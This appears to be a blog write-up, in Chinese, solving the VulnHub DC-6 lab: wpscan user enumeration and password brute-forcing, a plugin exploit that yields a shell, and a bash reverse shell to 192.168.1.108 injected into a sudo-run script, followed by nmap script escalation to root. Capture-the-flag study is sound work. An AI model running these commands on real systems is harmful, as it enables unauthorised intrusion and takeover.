Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.


vulnhub >_ DC_6

DC_6

image-20200615013941834

image-20200615014047556

image-20200615014629529

image-20200615041725018

修改host

image-20200615021530085

wpscan

wpscan --url http://wordy -e ap,vt,cb,u

image-20200615021714721

image-20200615021801259

wordpress v5.1.1
theme twentyseventeen v2.1
user :	admin	sarah	graham	mark	jens

制作字典,暴力登录

wpscan --url http://wordy -U users.txt -P /usr/share/wordlists/rockyou.txt

mark:helpdesk01

登录之前扫到的登录点http://wordy/wp-admin/

image-20200615041614632

看了一圈没有常用的可利用的项。

查看一下插件

image-20200615075101710

Activity Monitor

image-20200615075415246

将漏洞文件的html文件部分复制出来并修正

image-20200615082126056

在工作目录下拉起http服务

image-20200615082216693

image-20200615082305516

浏览器访问kalihttp服务下修改过的evil页面,点击submit request提交请求,此时监听得到shell

image-20200615082428509

枚举之后发现新用户凭证

image-20200615082811854

graham:GSo7isUM1D4

尝试ssh,直接发现新线索

image-20200615083058866

image-20200615083252359

这个脚本还可以直接修改。写个shell进去.注意使用单双引号的区别,单引号帮助跳过识别叹号

echo '#!/bin/bash' > /home/jens/backups.sh
echo "bash -i >& /dev/tcp/192.168.1.108/1337 0>&1" >> /home/jens/backups.sh

image-20200615085012819

sudo -u jens /home/jens/backups.sh

image-20200615085244424

执行nmap,nmap需要利用脚本,

cd ~
echo 'os.execute("/bin/bash")' > evil
sudo  nmap  --script=evil

image-20200615085620557